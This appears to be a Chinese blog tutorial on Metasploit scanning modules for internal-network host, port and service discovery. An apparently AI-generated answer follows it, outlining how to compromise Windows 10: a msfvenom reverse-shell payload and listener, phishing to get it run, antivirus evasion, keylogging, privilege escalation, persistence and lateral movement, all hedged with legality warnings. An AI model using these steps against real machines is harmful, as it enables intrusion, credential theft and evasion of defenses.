MSF 基本使用之信息收集

本文详细介绍了如何使用Metasploit Framework (MSF)进行内网主机探测,包括配置代理、添加路由转发,以及利用多种扫描模块进行主机存活探测、端口扫描和服务探测的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

简介

信息收集是渗透测试中首先要做的重要事项之一,目的是尽可能多的查找关于目标的信息,我们掌握的信息越多,渗透成功的机会越大。在信息收集阶段,我们主要任务是收集关于目标机器的一切信息,比如IP地址,开放的服务,开放的端口,存在的漏洞等。 这些信息在渗透测试过程中启到了至关重要的作用。
在这里插入图片描述
当我们通过代理可以进入某内网,需要对内网主机的服务进行探测。我们就可以使用MSF里面的内网主机探测模块了

在这之前,先修改 /etc/proxychains.conf ,加入我们的代理。然后 proxychains msfconsole 启动MSF,这样,我们的MSF就可以探测内网主机了。

或者是在MSF里面添加0.0.0.0/24的路由转发,这样,只要被控主机可以到达的地址,我们也就可以探测!route add 0.0.0.0 0.0.0.0 1

MSF的search支持type搜索:

search scanner type:auxiliary

在这里插入图片描述
主要介绍以下几种:

主机存活探测

auxiliary/scanner/discovery/arp_sweep    #基于ARP的主机发现
auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000),如果开放了端口,则说明该主机存活

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

端口扫描

auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000)
auxiliary/scanner/portscan/syn           #基于syn进行端口扫描
auxiliary/scanner/portscan/ack           #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口

Tip:扫描器模块一般使用RHOSTS,表示扫描整个网络,而不是RHOST(单机)

相对普通的TCP扫描来说,SYN扫描速度更快,因为它不会完成TCP三次握手,而且可以在一定程度上躲避防火墙和入侵检测系统的检测。

TCP 端口扫描
img
TCP SYN 扫描
img

服务探测

auxiliary/scanner/ftp/ftp_version        #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version        #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version  #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp            #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version      #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title             #探测内网http服务的标题
auxiliary/scanner/smb/smb_version        #发现内网smb服务,基于默认的445端口   
use auxiliary/scanner/mssql/mssql_schemadump  #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump  #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version    #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner        #发现内网RDP远程桌面服务,基于默认3389端口
auxiliary/scanner/redis/redis_server     #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version        #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname         #探测内网主机的netbios名字

参考:https://blog.csdn.net/qq_36119192/article/details/92556219

<think>好的,用户让我介绍如何使用Metasploit Framework(MSF)渗透Windows 10。首先,我需要考虑用户的需求是什么。可能他们正在学习渗透测试,或者对网络安全感兴趣。不过,我得注意这可能涉及非法活动,所以必须强调合法和授权的使用,避免法律问题。 接下来,用户可能是刚入门的安全爱好者,对MSF基本操作不太熟悉。他们可能需要步骤指导,但作为回应,我应该详细说明每个步骤,同时提醒他们不要用于非法用途。 我需要确认MSF渗透Win10的基本流程。通常步骤是生成恶意负载、设置监听、诱骗目标执行,然后利用漏洞获取控制权。不过,现代系统如Win10有安全防护,比如Defender和防火墙,所以可能需要禁用这些或使用免杀技术。 另外,用户可能不知道具体需要哪些工具和命令。比如使用msfvenom生成payload,设置handler,还有利用哪些漏洞模块。不过,公共漏洞可能已经被修复,所以实际测试中可能需要更复杂的漏洞利用,或者社会工程学方法。 还要考虑用户可能遇到的问题,比如payload无法执行,会话断开,或者权限不足。这时需要建议他们检查杀毒软件是否拦截,是否使用正确的payload类型,比如reverse_tcp或meterpreter,以及是否需要提权。 同时,必须强调授权的重要性,未经允许进行渗透测试是非法的。建议他们在虚拟机环境中测试,确保所有操作合法。此外,提醒他们注意道德和法律界限,避免触犯法律。 总结回答结构:先说明注意事项,再分步骤介绍流程,包括生成payload、设置监听、执行payload、维持权限和后渗透操作。最后强调合法性和道德问题,以及建议的学习资源。</think>使用 **Metasploit Framework (MSF)** 渗透测试 Windows 10 是网络安全中常见的实验场景,但必须强调:**仅在合法授权的环境下进行**。未经授权的渗透行为是非法的。以下是一个技术原理性概述,仅供学习参考。 --- ### **基本流程概述** 1. **生成恶意 Payload** 使用 `msfvenom` 生成针对 Windows 的恶意程序(如反向 Shell),例如: ```bash msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=端口 -f exe -o payload.exe ``` - `LHOST`: 攻击者的监听 IP。 - `LPORT`: 攻击者监听的端口。 - `-f exe`: 输出格式为可执行文件。 2. **设置监听器(Handler)** 在 Metasploit 中启动 `multi/handler` 模块,等待目标执行 Payload 后建立连接: ```bash msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 攻击者IP set LPORT 端口 exploit ``` 3. **诱使目标执行 Payload** 需通过社会工程学(如伪装文件、钓鱼邮件)或漏洞利用(如 SMB 漏洞 EternalBlue)诱骗用户运行 `payload.exe`。现代 Windows 10 默认开启 Defender,需配合免杀技术(如编码、加壳)绕过检测。 4. **获取 Meterpreter 会话** 目标执行 Payload 后,攻击者会获得 `meterpreter` 会话,可执行以下操作: - 信息收集:`sysinfo`, `screenshot`, `keyscan_start`(键盘记录)。 - 权限提升:`getsystem`(提权)或利用漏洞模块(如 `exploit/windows/local/bypassuac`)。 - 持久化:`persistence` 模块(注册表、计划任务)。 5. **后渗透操作** - 文件操作:上传/下载文件(`upload`, `download`)。 - 网络探测:`arp_scanner`, `portscan`。 - 横向移动:`psexec` 模块攻击内网其他主机。 --- ### **注意事项** 1. **防御规避** - Windows Defender 会拦截常见 Payload,需使用编码(如 `shikata_ga_nai`)或工具(如 Veil、Cobalt Strike)进行免杀。 - 防火墙可能阻止反向连接,可尝试使用 HTTPS 或 DNS 隧道绕过。 2. **漏洞依赖** - 公共漏洞(如 EternalBlue)仅适用于未打补丁的系统。需通过 `searchsploit` 或 `nmap` 扫描目标漏洞。 - 最新版 Windows 10 难以通过传统漏洞渗透,需结合钓鱼、0day 或配置错误。 3. **合法授权** 所有操作需在授权环境下进行(如虚拟机内测试),推荐使用 [Metasploitable](https://docs.rapid7.com/metasploit/metasploitable-2/) 或自建实验环境。 --- ### **防御建议(蓝队视角)** 1. 定期更新系统和软件补丁。 2. 启用防火墙和杀毒软件实时防护。 3. 限制用户权限,禁用不必要的服务。 4. 监控异常网络连接(如 Meterpreter 的默认端口 4444)。 --- 如需深入学习,可参考《Metasploit渗透测试指南》或 Offensive Security 的 [OSCP 课程](https://www.offensive-security.com/pwk-oscp/)。务必遵守法律与道德规范!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值